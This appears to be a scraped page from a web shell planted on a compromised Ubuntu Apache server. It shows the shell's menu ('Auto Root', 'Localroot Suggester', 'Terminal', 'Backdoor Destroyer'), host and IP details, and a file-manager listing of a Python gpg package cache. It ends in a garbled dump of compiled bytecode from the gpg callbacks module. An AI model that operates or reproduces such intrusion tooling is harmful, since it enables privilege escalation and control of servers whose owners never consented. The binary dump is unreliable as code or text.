Linux tsuru-no-tsurugi 5.15.0-186-generic #196-Ubuntu SMP Sat Jun 20 16:09:34 UTC 2026 x86_64
Apache/2.4.52 (Ubuntu)
Server IP : 192.168.0.18 & Your IP : 216.73.216.68
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
python3 /
dist-packages /
gpg /
__pycache__ /
Delete
Unzip
Name
Size
Permission
Date
Action
__init__.cpython-310.pyc
3.98
KB
-rw-r--r--
2024-09-07 23:28
callbacks.cpython-310.pyc
1.17
KB
-rw-r--r--
2024-09-07 23:28
core.cpython-310.pyc
52.25
KB
-rw-r--r--
2024-09-07 23:28
errors.cpython-310.pyc
7.62
KB
-rw-r--r--
2024-09-07 23:28
gpgme.cpython-310.pyc
133.59
KB
-rw-r--r--
2024-09-07 23:28
results.cpython-310.pyc
3.62
KB
-rw-r--r--
2024-09-07 23:28
util.cpython-310.pyc
1.58
KB
-rw-r--r--
2024-09-07 23:28
version.cpython-310.pyc
2.16
KB
-rw-r--r--
2024-09-07 23:28
Save
Rename
o 좃[� � @ sF d dl mZmZmZ d dlmZ [[[d dd�Zd dd�Zdd � ZdS )� )�absolute_import�print_function�unicode_literals)�getpassNc C s6 d}|dur d| }|r|d7 }t d| |f � t� S )z�This is a sample callback that will read a passphrase from the terminal. The hook here, if present, will be used to describe why the passphrase is needed.� N� z (again)zPlease supply %s' password%s:)�printr )�hint�desc�prev_bad�hook�why� r �//usr/lib/python3/dist-packages/gpg/callbacks.py�passphrase_stdin s r c C s t d| |||f � d S )Nz?PROGRESS UPDATE: what = %s, type = %d, current = %d, total = %d)r )�what�type�current�totalr r r r �progress_stdout&